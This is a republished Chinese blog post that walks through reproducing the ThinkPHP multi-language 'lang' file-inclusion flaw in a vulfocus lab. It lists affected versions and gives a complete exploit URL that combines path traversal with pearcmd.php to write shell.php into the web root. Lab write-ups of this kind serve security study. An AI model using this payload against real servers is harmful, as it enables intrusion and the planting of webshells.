返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >vulfocus复现:thinkphp lang 命令执行(thinkphp:6.0.12)
  • 318
分享到

vulfocus复现:thinkphp lang 命令执行(thinkphp:6.0.12)

php开发语言网络安全web安全安全 2023-09-04 18:09:26 318人浏览 薄情痞子
摘要

目录 描述(来自vulfocus): 漏洞介绍(来自vulfocus): 影响版本: 复现: 1,打开靶场,显示没有权限bp拦截  2,将phpinfo写到网站根目录下/var/www/html  3,访问shell.php  4,拿到fl

目录

描述(来自vulfocus):

漏洞介绍(来自vulfocus):

影响版本:

复现:

1,打开靶场,显示没有权限bp拦截

 2,将phpinfo写到网站根目录下/var/www/html

 3,访问shell.php

 4,拿到flag


描述(来自vulfocus):

ThinkPHP 是一个快速、简单的面向对象的轻量级 php 开发框架,创立于2006年初,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。

如果 Thinkphp 程序开启了多语言功能,攻击者可以通过 get、header、cookie 等位置传入参数,实现目录穿越+文件包含,通过 pearcmd 文件包含这个 trick 即可实现 RCE。

漏洞介绍(来自vulfocus):

在其6.0.13版本及以前,存在一处本地文件包含漏洞。当多语言特性被开启时,攻击者可以使用lang参数来包含任意PHP文件。

虽然只能包含本地PHP文件,但在开启了reGISter_arGC_argv且安装了pcel/pear的环境下,可以包含/usr/local/lib/php/pearcmd.php并写入任意文件

访问路径诶:/public/index.php

影响版本:

0.1 < ThinkPHP≤ 6.0.13

0.0 < ThinkPHP≤ 5.0.12

1.0 < ThinkPHP≤ 5.1.8

复现:

1,打开靶场,显示没有权限bp拦截

 2,将phpinfo写到网站根目录下/var/www/html

 public/index.php?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/+/var/www/html/shell.php

 

 3,访问shell.php

 4,拿到flag

 

 

来源地址:https://blog.csdn.net/m0_71518346/article/details/128360317

--结束END--

本文标题: vulfocus复现:thinkphp lang 命令执行(thinkphp:6.0.12)

本文链接: https://lsjlt.com/news/394107.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

猜你喜欢
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作